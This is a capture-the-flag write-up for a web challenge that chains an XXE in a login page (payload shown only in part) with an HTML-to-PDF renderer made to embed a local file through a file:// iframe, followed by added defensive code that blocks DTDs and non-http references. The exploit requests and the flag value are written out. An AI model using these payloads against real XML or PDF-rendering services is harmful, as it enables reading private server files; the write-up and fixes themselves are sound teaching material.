**web/include me**
flag is in /ctf/flag.txt
flag: `EHACON{lf1_@nd_xx3_1s_fun}`

```python
import requests

# The start of the payload (the DTD that defines the xx entity) is not shown in the writeup;
# the string below begins mid-document, right after that prefix.
d = """ ]><root><email>&xx;;</email><password>lol</password></root>"""
requests.post("http://chall.ctf-ehcon.ml:32104/login.php", data=d).text
```

This XXE in login.php is used to read the source of flag.php.
flag.php accepts a POST request with a `content` field, which it renders to a PDF.
Use an HTML iframe that points at a file:// URL so the renderer embeds the flag file.

```python
import requests

html = "<html><head></head><body><iframe src='file:///ctf/flag.txt'></iframe></body></html>"
requests.post("http://chall.ctf-ehcon.ml:32104/flag.php", data={"content": html})
```

then go to http://chall.ctf-ehcon.ml:32104/files/result.pdf and open the rendered PDF
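Both bugs in this challenge come down to the server fetching attacker-chosen resources: login.php resolves XML entities, and flag.php's HTML-to-PDF step follows file:// references. The checks below are an added example of the server-side fixes, not code from the challenge; the function names and the sample inputs are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# A login document never needs a DTD, so refuse any DOCTYPE/ENTITY declaration
# before the XML reaches a parser. This blocks entity-based file disclosure
# regardless of how the parser itself is configured.
DTD_MARKERS = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)

def reject_dtd(xml_bytes: bytes) -> bool:
    """Return True when the request body carries a DTD and must be refused."""
    return DTD_MARKERS.search(xml_bytes) is not None

class _RefCollector(HTMLParser):
    """Collect every attribute value that makes a renderer fetch something."""
    FETCH_ATTRS = ("src", "href", "data", "xlink:href")

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.lower() in self.FETCH_ATTRS and value:
                self.urls.append(value)

# The PDF renderer should only ever fetch absolute http(s) URLs; file://,
# relative paths (empty scheme) and anything else are rejected.
ALLOWED_SCHEMES = {"http", "https"}

def unsafe_references(html_text: str) -> list:
    """Return the references in user-supplied HTML that the renderer must not follow."""
    collector = _RefCollector()
    collector.feed(html_text)
    return [u for u in collector.urls
            if urlparse(u.strip()).scheme.lower() not in ALLOWED_SCHEMES]

def accept_pdf_content(html_text: str) -> bool:
    """Gate for flag.php-style endpoints: True only when every reference is safe."""
    return not unsafe_references(html_text)
```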